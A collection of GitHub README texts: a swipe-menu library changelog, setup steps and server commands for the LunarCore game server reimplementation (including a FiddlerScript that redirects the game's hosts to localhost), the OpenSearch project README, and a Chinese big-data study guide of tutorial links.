page of ViewPager. 2016 12 07 update: * Fix a bug :when using ListView,quick swipe and quick click del menu, next Item is Swiped.。 2016 12 07 update: * When the isSwipeEnable is false,the click event of contentItem is undisturbed。 2016 11 14 update: * support the padding, and the subsequent slide down on plans to join, so no longer support ContentItem margin properties. * modify the springback of animation, more smooth. * tiny displacement of the move does not rebound bug back 2016 11 09 update: 1 adapter GridLayoutManager, will be the first child Item (i.e. ContentItem) to control the width of the width. 2 when using, if you need to support full layout, remember that the first child Item (Content), if the width match_parent. 2016 11 04 update: 1 long was optimized according to the relationship between events and sideslip, as far as possible reference to QQ. 2016 11 03 update: 1 determine the starting point finger, if the distance to slide, shielding all the click event (like QQ interaction) 2016 10 21 update: 1 when the parent controls when the width is not full screen bug. 2 imitation QQ, sideslip menus, click on all regions except the sideslip menu includes the contents of the menu, close the side menu. 2016 10 21 update: 1 increase viewChache the get () method, which can be used in: when click on the external space, shut down is the slide of the menu. 2016 09 30 update: 1 support for slide. ! [image] (https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/doubleSwipe.gif) 2016-09 28 update site: Add an item 1 click event set example. 2016-09 12 update site: 1 increase with RecyclerView, ListView can delete the complete Demo for not using classmates reference. 2 add a quickClose () method, better use in the ListView, but still recommend use RecyclerView. ---
0
Melledy/LunarCore
A game server reimplementation for a certain turn-based anime game
game-server
![LunarCore](https://socialify.git.ci/Melledy/LunarCore/image?description=1&descriptionEditable=A%20game%20server%20reimplementation%20for%20version%202.1.0%20of%20a%20certain%20turn-based%20anime%20game%20for%20educational%20purposes.%20&font=Inter&forks=1&issues=1&language=1&name=1&owner=1&pulls=1&stargazers=1&theme=Light) <div align="center"><img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/Melledy/LunarCore?logo=java&style=for-the-badge"> <img alt="GitHub" src="https://img.shields.io/github/license/Melledy/LunarCore?style=for-the-badge"> <img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/Melledy/LunarCore?style=for-the-badge"> <img alt="GitHub Workflow Status" src="https://img.shields.io/github/actions/workflow/status/Melledy/LunarCore/build.yml?branch=development&logo=github&style=for-the-badge"></div> <div align="center"><a href="https://discord.gg/cfPKJ6N5hw"><img alt="Discord - Grasscutter" src="https://img.shields.io/discord/1163718404067303444?label=Discord&logo=discord&style=for-the-badge"></a></div> [EN](README.md) | [简中](docs/README_zh-CN.md) | [繁中](docs/README_zh-TW.md) | [JP](docs/README_ja-JP.md) | [RU](docs/README_ru-RU.md) | [FR](docs/README_fr-FR.md) | [KR](docs/README_ko-KR.md) | [VI](docs/README_vi-VI.md) **Attention:** For any extra support, questions, or discussions, check out our [Discord](https://discord.gg/cfPKJ6N5hw). ### Notable features - Basic game features: Logging in, team setup, inventory, basic scene/entity management - Monster battles working - Natural world monster/prop/NPC spawns - Character techniques - Crafting/Consumables working - NPC shops handled - Gacha system - Mail system - Friend system (Assists are not working yet) - Forgotten hall - Pure Fiction - Simulated universe (Runs can be finished, but many features are missing) # Running the server and client ### Prerequisites * [Java 17 JDK](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html) ### Recommended * [MongoDB 4.0+](https://www.mongodb.com/try/download/community) ### Compiling the server 1. Open your system terminal, and compile the server with `./gradlew jar` 2. Create a folder named `resources` in your server directory 3. Download the `Config`, `TextMap`, and `ExcelBin` folders from [https://github.com/Dimbreath/StarRailData](https://github.com/Dimbreath/StarRailData) and place them into your resources folder. 4. Delete the `/resources/Config/LevelOutput` folder. 5. Download the `Config` folder from [https://gitlab.com/Melledy/LunarCore-Configs](https://gitlab.com/Melledy/LunarCore-Configs) and place them into your resources folder. These are for world spawns and are very important for the server. 6. Run the server with `java -jar LunarCore.jar` from your system terminal. Lunar Core comes with a built-in internal MongoDB server for its database, so no Mongodb installation is required. However, it is highly recommended to install Mongodb anyway. ### Connecting with the client (Fiddler method) 1. **Log in with the client to an official server and Hoyoverse account at least once to download game data.** 2. Install and have [Fiddler Classic](https://www.telerik.com/fiddler) running. 3. Set fiddler to decrypt https traffic. (Tools -> Options -> HTTPS -> Decrypt HTTPS traffic) Make sure `ignore server certificate errors` is checked as well. 4. Copy and paste the following code into the Fiddlerscript tab of Fiddler Classic: ``` import System; import System.Windows.Forms; import Fiddler; import System.Text.RegularExpressions; class Handlers { static function OnBeforeRequest(oS: Session) { if (oS.host.EndsWith(".starrails.com") || oS.host.EndsWith(".hoyoverse.com") || oS.host.EndsWith(".mihoyo.com") || oS.host.EndsWith(".bhsr.com")) { oS.host = "localhost"; // This can also be replaced with another IP address. } } }; ``` 5. If `autoCreateAccount` is set to true in the config, then you can skip this step. Otherwise, type `/account create [account name]` in the server console to create an account. 6. Login with your account name, the password field is ignored by the server and can be set to anything. ### Server commands Server commands can be run in the server console or in-game. There is a dummy user named "Server" in every player's friends list that you can message to use in-game commands. ``` /account {create | delete} [username] (reserved player uid). Creates or deletes an account. /avatar lv(level) p(ascension) r(eidolon) s(skill levels). Sets the current avatar's properties. /clear {relics | lightcones | materials | items}. Removes filtered items from the player inventory. /gender {male | female}. Sets the player's gender. /give [item id] x[amount] lv[number]. Gives the targetted player an item. /giveall {materials | avatars | lightcones | relics}. Gives the targeted player items. /heal. Heals your avatars. /help. Displays a list of available commands. /kick @[player id]. Kicks a player from the server. /mail [content]. Sends the targeted player a system mail. /permission {add | remove | clear} [permission]. Gives/removes a permission from the targeted player. /refill. Refill your skill points in open world. /reload. Reloads the server config. /scene [scene id] [floor id]. Teleports the player to the specified scene. /spawn [monster/prop id] x[amount] s[stage id]. Spawns a monster or prop near the targeted player. /stop. Stops the server /unstuck @[player id]. Unstucks an offline player if they're in a scene that doesn't load. /worldlevel [world level]. Sets the targeted player's equilibrium level. ```
0
opensearch-project/OpenSearch
🔎 Open source distributed and RESTful search engine.
analytics apache2 foss hacktoberfest java search search-engine
<img src="https://opensearch.org/assets/img/opensearch-logo-themed.svg" height="64px"> [![Chat](https://img.shields.io/badge/chat-on%20forums-blue)](https://forum.opensearch.org/c/opensearch/) [![Documentation](https://img.shields.io/badge/documentation-reference-blue)](https://opensearch.org/docs/latest/opensearch/index/) [![Code Coverage](https://codecov.io/gh/opensearch-project/OpenSearch/branch/main/graph/badge.svg)](https://codecov.io/gh/opensearch-project/OpenSearch) [![Untriaged Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/untriaged?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"untriaged") [![Security Vulnerabilities](https://img.shields.io/github/issues/opensearch-project/OpenSearch/security%20vulnerability?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"security%20vulnerability") [![Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/issues) [![Open Pull Requests](https://img.shields.io/github/issues-pr/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/pulls) [![2.14.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v2.14.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"v2.14.0") [![3.0.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v3.0.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"v3.0.0") [![GHA gradle check](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml) [![GHA validate pull request](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml) [![GHA precommit](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml) [![Jenkins gradle check job](https://img.shields.io/jenkins/build?jobUrl=https%3A%2F%2Fbuild.ci.opensearch.org%2Fjob%2Fgradle-check%2F&label=Jenkins%20Gradle%20Check)](https://build.ci.opensearch.org/job/gradle-check/) - [Welcome!](#welcome) - [Project Resources](#project-resources) - [Code of Conduct](#code-of-conduct) - [Security](#security) - [License](#license) - [Copyright](#copyright) - [Trademark](#trademark) ## Welcome! **OpenSearch** is [a community-driven, open source fork](https://aws.amazon.com/blogs/opensource/introducing-opensearch/) of [Elasticsearch](https://en.wikipedia.org/wiki/Elasticsearch) and [Kibana](https://en.wikipedia.org/wiki/Kibana) following the [license change](https://blog.opensource.org/the-sspl-is-not-an-open-source-license/) in early 2021. We're looking to sustain (and evolve!) a search and analytics suite for the multitude of businesses who are dependent on the rights granted by the original, [Apache v2.0 License](LICENSE.txt). ## Project Resources * [Project Website](https://opensearch.org/) * [Downloads](https://opensearch.org/downloads.html) * [Documentation](https://opensearch.org/docs/) * Need help? Try [Forums](https://discuss.opendistrocommunity.dev/) * [Project Principles](https://opensearch.org/#principles) * [Contributing to OpenSearch](CONTRIBUTING.md) * [Maintainer Responsibilities](MAINTAINERS.md) * [Release Management](RELEASING.md) * [Admin Responsibilities](ADMINS.md) * [Testing](TESTING.md) * [Security](SECURITY.md) ## Code of Conduct This project has adopted the [Amazon Open Source Code of Conduct](CODE_OF_CONDUCT.md). For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq), or contact [opensource-codeofconduct@amazon.com](mailto:opensource-codeofconduct@amazon.com) with any additional questions or comments. ## Security If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do **not** create a public GitHub issue. ## License This project is licensed under the [Apache v2.0 License](LICENSE.txt). ## Copyright Copyright OpenSearch Contributors. See [NOTICE](NOTICE.txt) for details. ## Trademark OpenSearch is a registered trademark of Amazon Web Services. OpenSearch includes certain Apache-licensed Elasticsearch code from Elasticsearch B.V. and other source code. Elasticsearch B.V. is not the source of that other source code. ELASTICSEARCH is a registered trademark of Elasticsearch B.V.
0
MoRan1607/BigDataGuide
大数据学习,从零开始学习大数据,包含大数据学习各阶段学习视频、面试资料
bigdata flink flume hadoop hbase hive javase kafka scala spark zookeeper
大数据学习指南 === >大数据学习指南,从零开始学习大数据开发,包含大数据学习各个阶段资汇总 ## 公众号 关注我的公众号:**旧时光大数据**,回复相应关键字,获取更多大数据干货、资料<br> “大数据学习路线”中我自己看过的视频、文档资料可以直接在公众号获取云盘链接 ## <font color=blue>更新中。。。</font> #### 牛客网面经 #### 大数据面试题 ### 《[大数据面试题 V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)》已出,公众号回复:大数据面试题 <p align="center"> <img src="https://github.com/MoRan1607/BigDataGuide/blob/master/Pics/%E5%85%AC%E4%BC%97%E5%8F%B7%E4%BA%8C%E7%BB%B4%E7%A0%81.jpg" width="200" height="200"/> <p align="center"> </p> </p> ## 知识星球 知识星球内容包括**学习路线**、**学习资料**(根据编程语言(Java、Python、Java+Scala)分了三大版本)、项目(**50+个大数据项目**)、面试题(**700+道真实大数据面试题**、Java基础、计算机网络、Redis)、**1000+篇大数据真实面经**、600+篇Java后端真实面经(已按公司分类)、自己整理的视频学习笔记 **[知识星球资料介绍](https://www.yuque.com/vxo919/gyyog3/ohvyc2e38pprcxkn?singleDoc=)** <p align="center"> <img src="https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E6%98%9F%E7%90%83%E4%BC%98%E6%83%A0%E5%88%B8%20(1).png" width="300" height="387"/> <p align="center"> </p> </p> 概述 --- [大数据简介](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%AE%80%E4%BB%8B.md) [大数据相关岗位介绍](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9B%B8%E5%85%B3%E5%B2%97%E4%BD%8D%E4%BB%8B%E7%BB%8D.md) 大数据学习路线 --- 学习路线中的视频、文档资料可以关注公众号:旧时光大数据,回复相应关键字获取云盘链接 [大数据学习路线(包含自己看过的视频链接)](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF.md) 编程语言 --- 编程语言部分建议先JavaSE,Spark和Flink之前学习Scala,如果时间紧迫,就找个Java版的Spark或Flink教程,Python看个人或工作,不过有Java基础,Python会快很多(别问我怎么学,问就是使劲拼命学 [ 吃瓜.jpg ]) ### 一、JavaSE(二选一) [刘意2019版](https://www.bilibili.com/video/BV1gb411F76B?from=search&seid=16116797084076868427) [尚硅谷宋红康版](https://www.bilibili.com/video/BV1Kb411W75N?from=search&seid=9321658006825735818) ### 二、Scala(二选一) 如果时间短,建议直接看配套Spark的那种三五天的,可以快速了解 [韩顺平老师版](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134) [清华硕士武晟然老师版](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134) ### 三、Python 推荐黑马的Python视频,通俗易懂,而且文档比较齐全,有Java基础再看Python的话,上手很快 [黑马Python版视频](https://www.bilibili.com/video/BV1C4411A7ej?from=search&seid=11669436417044703145) [Python文档and笔记](https://github.com/MoRan1607/BigDataGuide/blob/master/Python/Python%E6%96%87%E6%A1%A3.md) Linux --- [完全分布式集群搭建文档](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/%E5%88%86%E5%B8%83%E5%BC%8F%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA.md) 关于VM、远程登录工具的安装暂时可以参考我的博客,找到相应步骤进行操作即可 [集群搭建](https://blog.csdn.net/qq_41544550/category_9458240.html) 大数据框架组件 --- ### 一、Hadoop &emsp; 1. [Hadoop——分布式文件管理系统HDFS](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS.md) &emsp; 2. [Hadoop——HDFS的Shell操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Shell%E6%93%8D%E4%BD%9C.md) &emsp; 3. [Hadoop——HDFS的Java API操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Java%20API%E6%93%8D%E4%BD%9C.md) &emsp; 4. [Hadoop——分布式计算框架MapReduce](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce.md) &emsp; 5. [Hadoop——MapReduce案例](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce%E6%A1%88%E4%BE%8B.md) &emsp; 6. [Hadoop——资源调度器YARN](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/YARN.md) &emsp; 7. [Hadoop——Hadoop数据压缩](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/Hadoop%E6%95%B0%E6%8D%AE%E5%8E%8B%E7%BC%A9.md) ### 二、Zookeeper &emsp; 1.[Zookeeper——Zookeeper概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%80%EF%BC%89.md) &emsp; 2.[Zookeeper——Zookeeper单机和分布式安装](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%8C%EF%BC%89.md) &emsp; 3.[Zookeeper——Zookeeper客户端命令](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%89%EF%BC%89.md) &emsp; 4.[Zookeeper——Zookeeper内部原理](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E5%9B%9B%EF%BC%89.md) &emsp; 5.[Zookeeper——Zookeeper实战](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%94%EF%BC%89.md) ### 三、Hive &emsp; 1.[Hive——Hive概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/1%E3%80%81Hive%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Hive——Hive数据类型](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/2%E3%80%81Hive%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B.md) &emsp; 3.[Hive——Hive DDL数据定义](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/3%E3%80%81Hive%20DDL%E6%95%B0%E6%8D%AE.md) &emsp; 4.[Hive——Hive DML数据操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/4%E3%80%81Hive%20DML%E6%95%B0%E6%8D%AE%E6%93%8D%E4%BD%9C.md) &emsp; 5.[Hive——Hive查询](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/5%E3%80%81Hive%E6%9F%A5%E8%AF%A2.md) &emsp; 6.[Hive——Hive函数](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/6%E3%80%81Hive%E5%87%BD%E6%95%B0.md) &emsp; 7.[Hive——Hive压缩和存储](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/7%E3%80%81Hive%E5%8E%8B%E7%BC%A9%E5%92%8C%E5%AD%98%E5%82%A8.md) &emsp; 8.[Hive——Hive实战:统计影音视频网站的常规指标](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/8%E3%80%81Hive%E5%AE%9E%E6%88%98%EF%BC%9A%E7%BB%9F%E8%AE%A1%E5%BD%B1%E9%9F%B3%E8%A7%86%E9%A2%91%E7%BD%91%E7%AB%99%E7%9A%84%E5%B8%B8%E8%A7%84%E6%8C%87%E6%A0%87.md) &emsp; 9.[Hive——Hive分区表和分桶表](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/9%E3%80%81%E5%88%86%E5%8C%BA%E8%A1%A8%E5%92%8C%E5%88%86%E6%A1%B6%E8%A1%A8.md) &emsp; 10.[Hive——Hive调优](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/10%E3%80%81Hive%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B0%83%E4%BC%98.md) ### 四、Flume &emsp; 1.[Flume——Flume概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/1%E3%80%81Flume%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Flume——Flume实践操作](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/2%E3%80%81Flume%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) &emsp; 3.[Flume——Flume案例](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/3%E3%80%81Flume%E6%A1%88%E4%BE%8B.md) ### 五、Kafka &emsp; 1.[Kafka——Kafka概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/1%E3%80%81Kafka%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Kafka——Kafka深入解析](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/2%E3%80%81Kafka%E6%B7%B1%E5%85%A5%E8%A7%A3%E6%9E%90.md) &emsp; 3.[Kafka——Kafka API操作实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/3%E3%80%81Kafka%20API%E6%93%8D%E4%BD%9C%E5%AE%9E%E8%B7%B5.md) &emsp; 3.[Kafka——Kafka对接Flume实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/4%E3%80%81Flume%E5%AF%B9%E6%8E%A5Kafka%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) ### 六、HBase &emsp; 1.[HBase——HBase概述](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/1%E3%80%81HBase%E6%A6%82%E8%BF%B0.md) &emsp; 2.[HBase——HBase数据结构](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/2%E3%80%81HBase%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84.md) &emsp; 3.[HBase——HBase Shell操作](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/3%E3%80%81HBase%20Shell%E6%93%8D%E4%BD%9C.md) &emsp; 4.[HBase——HBase API实践操作](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/4%E3%80%81HBase%20API%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md) ### 七、Spark #### Spark基础 &emsp; 1.[Spark基础——Spark的诞生](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/1%E3%80%81Spark%E7%9A%84%E8%AF%9E%E7%94%9F.md) &emsp; 2.[Spark基础——Spark概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md) &emsp; 3.[Spark基础——Spark运行模式](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/3%E3%80%81Spark%E8%BF%90%E8%A1%8C%E6%A8%A1%E5%BC%8F.md) &emsp; 4.[Spark基础——案例实践](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md) #### Spark Core &emsp; 1.[Spark Core——RDD概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/1%E3%80%81RDD%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Spark Core——RDD编程(一)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/2%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%88%E4%B8%80%EF%BC%89.md) &emsp; 3.[Spark Core——RDD编程(二)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/3%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%882%EF%BC%89.md) &emsp; 4.[Spark Core——键值对RDD数据分区器](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/4%E3%80%81%E9%94%AE%E5%80%BC%E5%AF%B9RDD%E6%95%B0%E6%8D%AE%E5%88%86%E5%8C%BA%E5%99%A8.md) &emsp; 5.[Spark Core——数据读取与保存](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/5%E3%80%81%E6%95%B0%E6%8D%AE%E8%AF%BB%E5%8F%96%E4%B8%8E%E4%BF%9D%E5%AD%98.md) #### Spark SQL &emsp; 1.[Spark SQL——Spaek SQL概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/1%E3%80%81Spark%20SQL%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Spark SQL——Spaek SQL编程](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/2%E3%80%81Spark%20SQL%E7%BC%96%E7%A8%8B.md) &emsp; 3.[Spark SQL——Spaek SQL数据的加载与保存](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/3%E3%80%81Spark%20SQL%E6%95%B0%E6%8D%AE%E7%9A%84%E5%8A%A0%E8%BD%BD%E4%B8%8E%E4%BF%9D%E5%AD%98.md) &emsp; 4.[Spark SQL——Spaek SQL实战](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/4%E3%80%81Spark%20SQL%E5%AE%9E%E6%88%98.md) #### Spark Streaming &emsp; 1.[Spark Streaming——Spark Streaming概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/1%E3%80%81Spark%20Streaming%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Spark Streaming——Dstream基础](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/2%E3%80%81Dstream%E5%9F%BA%E7%A1%80.md) &emsp; 3.[Spark Streaming——Dstream的转换&输出](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/3%E3%80%81Dstream%E7%9A%84%E8%BD%AC%E6%8D%A2%26%E8%BE%93%E5%87%BA.md) ### 八、Flink &emsp; 1.[Flink——Flink核心概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/1%E3%80%81Flink%E6%A6%82%E8%BF%B0.md) &emsp; 2.[Flink——Flink部署](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/2%E3%80%81Flink%E9%83%A8%E7%BD%B2.md) &emsp; 3.[Flink——Flink运行架构](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/3、Flink运行架构.md) &emsp; 4.[Flink——Flink流处理API](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/4%E3%80%81Flink%E6%B5%81%E5%A4%84%E7%90%86API.md) &emsp; 5.[Flink——Flink中的Window](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/5%E3%80%81Flink%E4%B8%AD%E7%9A%84Window.md) &emsp; 6.[Flink——时间语义与Wartermark](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/6、时间语义与Wartermark.md) &emsp; 7.[Flink——ProcessFunction API(底层API)](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/7%E3%80%81ProcessFunction%20API%EF%BC%88%E5%BA%95%E5%B1%82API%EF%BC%89.md) &emsp; 8.[Flink——状态编程和容错机制](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/8%E3%80%81%E7%8A%B6%E6%80%81%E7%BC%96%E7%A8%8B%E5%92%8C%E5%AE%B9%E9%94%99%E6%9C%BA%E5%88%B6.md) &emsp; 9.[Flink——Table API 与SQL](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/9%E3%80%81Table%20API%20%E4%B8%8ESQL.md) &emsp; 10.[Flink——Flink CEP](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/10%E3%80%81Flink%20CEP.md) 数据仓库 --- &emsp; [数据仓库总结](https://zhuanlan.zhihu.com/p/371365562) 大数据项目 --- &emsp; **基本上选择三到四个即可,B站直接搜索项目名字,都有视频** &emsp; **详细说明公众号(旧时光大数据)回复“大数据项目”即可** 读书笔记 --- #### 《阿里大数据之路》读书笔记 [第一章 总述](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E3%80%8A%E9%98%BF%E9%87%8C%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B9%8B%E8%B7%AF%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0%EF%BC%9A%E7%AC%AC%E4%B8%80%E7%AB%A0%20%E6%80%BB%E8%BF%B0.md) [第二章 日志采集](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E7%AC%AC%E4%BA%8C%E7%AB%A0%EF%BC%9A%E6%97%A5%E5%BF%97%E9%87%87%E9%9B%86.pdf) [第三章 数据同步](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E4%B8%89%E7%AB%A0%EF%BC%9A%E6%95%B0%E6%8D%AE%E5%90%8C%E6%AD%A5.pdf) [第四章 离线数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E5%9B%9B%E7%AB%A0%EF%BC%9A%E7%A6%BB%E7%BA%BF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91.pdf) 面试题 --- > #### 陆续更新中。。。。。全量面试题(700+道牛客网面经原题)见知识星球 ### [大数据面试题 V1.0](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E8%AF%95%E9%A2%98%20V1.0.md) ### [大数据面试题 V3.0](https://mp.weixin.qq.com/s/hMcuDEkzH49rfSmGWy_GRg) ### [大数据面试题 V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ) #### 一、Hadoop ##### 1、Hadoop基础 [介绍下Hadoop](https://blog.csdn.net/qq_41544550/article/details/123031348) [Hadoop小文件处理问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/Hadoop%E5%B0%8F%E6%96%87%E4%BB%B6%E5%A4%84%E7%90%86%E9%97%AE%E9%A2%98.md) [Hadoop中的几个进程和作用](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E4%B8%AD%E7%9A%84%E5%87%A0%E4%B8%AA%E8%BF%9B%E7%A8%8B%E5%92%8C%E4%BD%9C%E7%94%A8.pdf) [Hadoop的mapper和reducer的个数如何确定?reducer的个数依据是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E7%9A%84mapper%E5%92%8Creducer%E7%9A%84%E4%B8%AA%E6%95%B0%E5%A6%82%E4%BD%95%E7%A1%AE%E5%AE%9A%EF%BC%9Freducer%E7%9A%84%E4%B8%AA%E6%95%B0%E4%BE%9D%E6%8D%AE%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### 2、HDFS [HDFS读写流程](https://blog.csdn.net/qq_41544550/article/details/103113335) 